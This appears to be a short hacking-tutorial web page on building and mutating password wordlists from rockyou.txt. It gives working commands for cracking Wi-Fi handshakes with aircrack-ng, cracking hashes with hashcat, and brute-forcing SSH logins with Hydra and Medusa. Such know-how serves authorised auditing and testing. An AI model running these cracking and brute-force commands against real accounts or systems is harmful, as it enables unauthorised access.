Password List Creation & Usage Guide

> Password List Creation & Usage Guide

> 🧠 Why Custom Wordlists Matter

Everyone uses rockyou.txt. To up your game in cracking, audits, or testing, create stronger, smarter, and personalized lists.

> πŸ“¦ Collect Your Raw Lists

> πŸ§ͺ Combine Wordlists

cat rockyou.txt probable.txt other.txt > combined.txt

> 🚿 Remove Duplicates

sort -u combined.txt > rockyouelite.txt

This removes duplicates for a clean base list.

> πŸ”§ Mutate for Bruteforce Power

awk '{print $0"\n"$0"!"\n"$0"$"\n"$0"1"\n"$0"1!"\n"$0"1$"}' rockyouelite.txt > rockyoumega.txt

> πŸ”  Add Case Variations

awk '{print $0; print toupper($0)}' rockyouelite.txt > uppermix.txt

> πŸ›  Recommended Tools

  • CeWL: crawl URLs for words
  • Crunch: generate lists by pattern
  • John the Ripper: powerful mangling
  • Hashcat: GPU cracking with rules

> βš”οΈ Use With Popular Crackers

aircrack-ng -w rockyouelite.txt -b [BSSID] capture.cap
hashcat -a 0 -m 0 hashes.txt rockyouelite.txt -r rules/best64.rule

> πŸ’€ Bonus: SSH Bruteforce

Hydra

hydra -L users.txt -P rockyoumega.txt ssh://target-ip

Medusa

medusa -U users.txt -P rockyoumega.txt -M ssh -h target-ip

> ☠️ Final Thoughts

This isn’t just about brute force β€” it’s about understanding human habits and weak security. Hack smart, not loud.

Respect privacy. Hack ethically. Stay elite.

Scroll to Top